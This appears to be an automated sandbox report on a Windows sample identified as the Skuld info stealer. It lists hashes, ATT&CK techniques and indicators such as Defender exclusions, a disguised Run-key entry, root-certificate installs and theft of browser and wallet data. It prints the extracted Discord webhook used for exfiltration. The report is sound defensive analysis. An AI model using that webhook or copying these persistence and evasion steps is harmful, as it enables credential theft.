skuld | 1ee7c8f4ec2d4fde0a8dcd33c6ec12e80479ce99e9b3efdb430a1d408487fc41

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2024 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Size

14.2MB
MD5

c31b7327783e94ba4d33daee19d13126
SHA1

fe4c6ef4372800cb9344ea79089a886b9fc483bb
SHA256

1ee7c8f4ec2d4fde0a8dcd33c6ec12e80479ce99e9b3efdb430a1d408487fc41
SHA512

1c79aac263598034b8baca1b2031f8e126930cc869ee34fff692a96cf81a4c43b7b0b6017335b7dfcde33f222709dc6fa3f2198e7af107a185040d8b1b8da9a7
SSDEEP

196608:jWJafoL/tUoTX4Zzbh1Yf0k7Ma/rkFlgdTaUrPPbdfw:jWsfm/2bh1lkSFCdTauZo

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://ptb.discord.com/api/webhooks/1258370606617985124/ZKzGvbPw4E_h8iy2cLQqE7gI1qxDBEoEg86CnrRPkpo0pHUo5LtTcCn_z5-QYIPGq-aI

Signatures

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
64	powershell.exe
3756	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
2	api.ipify.org
3	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3676	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5004	wmic.exe
4640	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	5	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
64	powershell.exe
64	powershell.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3756	powershell.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3756	powershell.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
Token: SeIncreaseQuotaPrivilege	4400	wmic.exe
Token: SeSecurityPrivilege	4400	wmic.exe
Token: SeTakeOwnershipPrivilege	4400	wmic.exe
Token: SeLoadDriverPrivilege	4400	wmic.exe
Token: SeSystemProfilePrivilege	4400	wmic.exe
Token: SeSystemtimePrivilege	4400	wmic.exe
Token: SeProfSingleProcessPrivilege	4400	wmic.exe
Token: SeIncBasePriorityPrivilege	4400	wmic.exe
Token: SeCreatePagefilePrivilege	4400	wmic.exe
Token: SeBackupPrivilege	4400	wmic.exe
Token: SeRestorePrivilege	4400	wmic.exe
Token: SeShutdownPrivilege	4400	wmic.exe
Token: SeDebugPrivilege	4400	wmic.exe
Token: SeSystemEnvironmentPrivilege	4400	wmic.exe
Token: SeRemoteShutdownPrivilege	4400	wmic.exe
Token: SeUndockPrivilege	4400	wmic.exe
Token: SeManageVolumePrivilege	4400	wmic.exe
Token: 33	4400	wmic.exe
Token: 34	4400	wmic.exe
Token: 35	4400	wmic.exe
Token: 36	4400	wmic.exe
Token: SeIncreaseQuotaPrivilege	4400	wmic.exe
Token: SeSecurityPrivilege	4400	wmic.exe
Token: SeTakeOwnershipPrivilege	4400	wmic.exe
Token: SeLoadDriverPrivilege	4400	wmic.exe
Token: SeSystemProfilePrivilege	4400	wmic.exe
Token: SeSystemtimePrivilege	4400	wmic.exe
Token: SeProfSingleProcessPrivilege	4400	wmic.exe
Token: SeIncBasePriorityPrivilege	4400	wmic.exe
Token: SeCreatePagefilePrivilege	4400	wmic.exe
